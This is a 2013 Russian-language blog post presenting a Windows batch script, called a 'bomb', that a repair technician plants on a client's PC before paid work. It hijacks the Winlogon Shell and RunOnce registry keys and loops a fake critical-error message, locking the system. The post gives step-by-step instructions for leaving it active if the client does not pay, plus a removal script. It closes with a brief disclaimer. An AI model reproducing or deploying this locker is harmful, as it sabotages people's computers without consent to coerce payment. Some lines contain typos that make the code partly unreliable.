23.08.2013

Бомба для недобросовестного клиента

Обратился ко мне один знакомый аникейщик. Он хотел, чтобы я написал скрипт, который будет как либо портить жизнь его клиентов, которые его кидают. Например, они согласились на ремонт и его оплату, т.е. согласились с суммой. Когда работа уже сделана, клиент выгоняет тебя, ничего не заплатив. Как с этим бороться? Я написал простой батничек. Вот его исходники:



@echo off
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d %systemroot%\restore.bat /f >nul
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /d %systemroot$\restore.bat /f >nul
Echo Attention! Crytical system error! Kernel rebilding. Don`t touching a keyboard!
:sysinf >nul
systeminfo >nul
goto sysinf >nul


Теперь разберемся. Первые две строчки прописывают файл в реестр. Сначала для запуска вместо explorer.exe, а затем для единоразового автоматического запуска при старте системы (для любого пользователя). В конце всех строк, кроме первой и четвертой имеется параметр ">nul". Этот параметр отвечает за отсутствие вывода результатов работы команд.

Пятая строчка является меткой, по вызову которой следует незамедлительно мыполнить нижеследующие команды.

Шестой строчкой я делаю запрос о состоянии системы. Т.е. какое железо и обновления установлены на компе. Команду можно смело сменить на другую. Было необходимо, чтобы были сменяющиеся надписи.

Седьмая строка возвращает выполнение на метку (пятая строка) после выполнения шестой строки, что приводит машину к замкнутому циклу. По сути, появляется тот же самый порно баннер, только его можно закрыть. С другой стороны, после перезапуска он появится вновь.

А вот второй код, убирающий действие первого.

@echo off
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d explorer.exe /f >nul
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /d   /f >nul


Схема работы.
1. Копируете первый батник (restore.bat) в папку виндоус на системе клиента. Внимание! Сделать это надо ДО начала платных работ.
2. Запускаем его и как только появляется надпись, закрываем (значит, что ключи прописаны).
3. Если вас выгоняют - просто уходим. Все работает до первой перезагрузки. Если все нормально - запускаем второй батник (называйте, как хотите). Он вернет систему в первоначальное состояние.

Конечно, использовать его не надо. На самом деле, он необходим, чтобы вы знали, куда копать, если появится подобное. А также, чтобы понимали, что могут сделать люди, которых кинули. Поговорка "Скупой платит дважды" как раз про эту ситуацию.


Отсюда

Комментариев нет:

Отправить комментарий